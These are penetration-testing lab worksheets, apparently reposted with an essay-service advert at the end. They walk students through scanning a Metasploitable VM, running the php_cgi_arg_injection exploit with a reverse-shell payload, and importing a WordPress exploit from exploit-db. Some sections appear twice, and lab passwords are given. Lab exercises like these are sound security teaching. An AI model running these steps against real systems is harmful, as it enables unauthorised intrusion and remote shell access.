Computer Science

All of these ports and the services/applications running on them have the

potential to be exploited but we have to determine the version of the software

running on them.

6. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running.

Let’s see if we can find out more information about the software running on

port 80.

7. Type: use scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We’ll use that to specify the IP

of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target’s IP.)

10.Type: set RPORT 80

11. Type: exploit

12. Take notice of the results: Powered by PHP/5.2.4ubuntu5.10

13. We just learned a little bit more about our Apache server running an Ubuntu

OS. It’s running PHP 5.2.4.

14. Let’s find out what exploits exist for PHP. Maximize your VMware window and

type: clear

15. Type and wait: search php type:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this

exploit?

ANSWER:

18. Now that we believe we may have a working exploit let’s view and choose the desired payload that is compatible with this exploit. Type: show payloads

19. We’ll go with a stable and reliable reverse shell. Type: set PAYLOAD

generic/shell_reverse_tcp

20. Type: set RHOST x.x.x.x (IP of target.)

21. Type: set LHOST x.x.x.x (Your IP.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options

you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. Type: ls

a. How many files and folders were displayed.

ANSWER:

27. Type: pwd

a. Document your present working directory.

ANSWER:

28. Type: whoami

a. Document the name of the account you are logged on with.

ANSWER:

29. Type: uname –a

30. Type: cat /etc/issue

Excellent! You’ve used the MSFconsole to run a port scan and save the contents

of that scan to a database for later retrieval. You further investigated a port

of interest by running an additional scanner against it and determined more

information about the application and version information. You then searched

Metasploit’s database for applicable exploits. Once you found an appropriate

exploit you determined the payload you will use, ran it, got a reverse shell,

and verified connectivity by executing some simple commands. Congratulations!

Following these simple steps when trying to penetration test systems will aid

you in better understanding the nuances of exploiting systems.

29. Press ctrl+c. Type “y” when prompted.

30. Type: back

31. Type: exit

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and

login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start

3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and

launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The

database is very useful for capturing and organizing penetration testing data

that you may want to refer to again, use for automating penetration tests,

share with others, create reports, etc. The database contains these tables:

hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (Allows you to specify the type of database you will be connecting

to: MySQL, SQLite, PostgreSQL, etc.)

db_status (Tells you the type of database you’re connected to.)

db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let’s populate it with

target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You’ve just added the contents of your nmap scan to the database. Let’s

view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t

populated the database with any of that information. FYI, the vulns information

may be imported from .nessus files. If you’re not familiar with Nessus Google

it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a

vulnerability scan may not seem immensely helpful in a lab setting because

we’re only scanning 1 system but what if we were scanning 10 systems or 100

systems or 1000 systems or 10000 systems or even more? It is simply not

feasible for a pen tester to scroll through the results and manually document

interesting findings. That’s where the beauty of logging our penetration

testing results to databases really pays off. Being able to instantly reference

all of the hosts we’ve scanned for a project or reviewing all of the possible

vulnerabilities in systems we’ll be exploiting is a professional approach to

handling the mountains of data that may be generated during a customer

engagement.

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and

login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start

3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and

launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The

database is very useful for capturing and organizing penetration testing data

that you may want to refer to again, use for automating penetration tests,

share with others, create reports, etc. The database contains these tables:

hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (Allows you to specify the type of database you will be connecting

to: MySQL, SQLite, PostgreSQL, etc.)

db_status (Tells you the type of database you’re connected to.)

db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let’s populate it with

target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You’ve just added the contents of your nmap scan to the database. Let’s

view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t

populated the database with any of that information. FYI, the vulns information

may be imported from .nessus files. If you’re not familiar with Nessus Google

it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a

vulnerability scan may not seem immensely helpful in a lab setting because

we’re only scanning 1 system but what if we were scanning 10 systems or 100

systems or 1000 systems or 10000 systems or even more? It is simply not

feasible for a pen tester to scroll through the results and manually document

interesting findings. That’s where the beauty of logging our penetration

testing results to databases really pays off. Being able to instantly reference

all of the hosts we’ve scanned for a project or reviewing all of the possible

vulnerabilities in systems we’ll be exploiting is a professional approach to

handling the mountains of data that may be generated during a customer

engagement.

Updating Metasploit Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Launch Metasploit by typing: msfconsole

There are many reasons to update Metasploit. Updating Metasploit will install bug fixes, new community tools, and most importantly – add exploit modules. There are two ways to do this. Your first option is to update Metasploit in an automated fashion by typing “msfupdate” at the command line. This requires registration with Rapid7 for a community edition key. This will update Metasploit with the latest settings, ruby version, modules, etc. You may also simply update Kali by going to “Applications-System Tools-Software Update”. The second way to update Metasploit is manually. Being able to update Metasploit is important because it allows you to import the latest exploits, regardless of where you find them, as long as they follow Rapid7’s development rules for Metasploit modules. It’s also important because the automated update tool will sometimes break your Metasploit install by modifying your Ruby version or making another change to your environment. This lab will focus on sharpening your skills as penetration testers by having you search for an exploit online, download the exploit, install the exploit, and test the exploit. There is a third way to update Metasploit – Build your own module. You’ll have to know how to program in Ruby. You can learn more about Metasploit exploit development here: http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word “Places” and navigate to: http://www.exploit-db.com/ WordPress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.

2. Click on the “Search” button.

3. In the “Free Text Search” field type: WordPress

4. Click “Search”.

5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been vetted by the Rapid7 community. It’s critical that you only import and use trusted exploits. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer’s system.

6. Go to page 9 and click on “WordPress HMS Testimonials Plugin 2.0.10 – Multiple Vulnerabilities”.

7. Who is the author of this exploit?

7a. Answer:

8. What date was this exploit published?

8a. Answer:

9. Now click the download icon next to these words “Exploit Code:”.

10. What type of file is this?

10a. Answer:

11. Open the file that you downloaded. As you can see these are instructions for exploiting a WordPress vulnerability in the way user feedback may be posted. So how would you go about loading this module into Metasploit? You wouldn’t. This is simply a text file that walks through manually exploiting WordPress but I chose to show it to you because, as you can see, when you’re looking for the latest exploits you don’t always need to load a module. There are hands-on instructions for exploiting this vulnerability. If there isn’t a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.

Metasploit is built on the Ruby programming framework. This means that our modules need to be .rb files. Any exploits that we want to import will need to be converted to Ruby code if they aren’t already.

12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: WordPress W3 Total Cache PHP Code Execution

13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to “Save in folder:” and select “Desktop”.

14. Click “Save”.

15. Minimize all of your windows. You should see a Ruby file on your desktop.

16. Switch your focus to your Metasploit instance. How many exploits are listed? Type: banner

16a. Answer:

17. Now it’s time to import your new Ruby file to the Metasploit framework. Open a shell by clicking on the black box next to the word “Places” at the top of your desktop screen. Type this to copy in your new exploit: cp /root/Desktop/wordpress_w3_php_code_exec.rb

/usr/share/metasploit-framework/modules/exploits/multi/php

18. Switch back to your Metasploit shell and type: reload_all

19. How many exploits do you have now?

19a. Answer:

20. Type: use exploit/multi/php/wordpress_w3_php_code_exec

21. Type: info

What does this module do?

21a. Answer:

You now have a better understanding of when to download an exploit versus updating your entire Metasploit install. You’ve downloaded an exploit that you needed and manually added it to Metasploit. You’ve looked for a recently published exploit, download it, copied it to the appropriate location within Metasploit, and verified its availability as a module.

Now let’s look at the professional version of Metasploit.

Type: go_pro

Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version.

Metasploit Scanning Lab

Class:

Name:

Date:

1. If your VMs aren’t already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: msfconsole

4. Open another instance of VMware Player and launch the Metasploitable VM.

5. At the user logon prompt type: msfadmin

6. At the password prompt type: msfadmin

7. Type: ifconfig

8. Record the Metasploitable VM IP address here:

Order now and get 10% discount on all orders above $50 now!!The professional are ready and willing handle your assignment.

ORDER NOW »»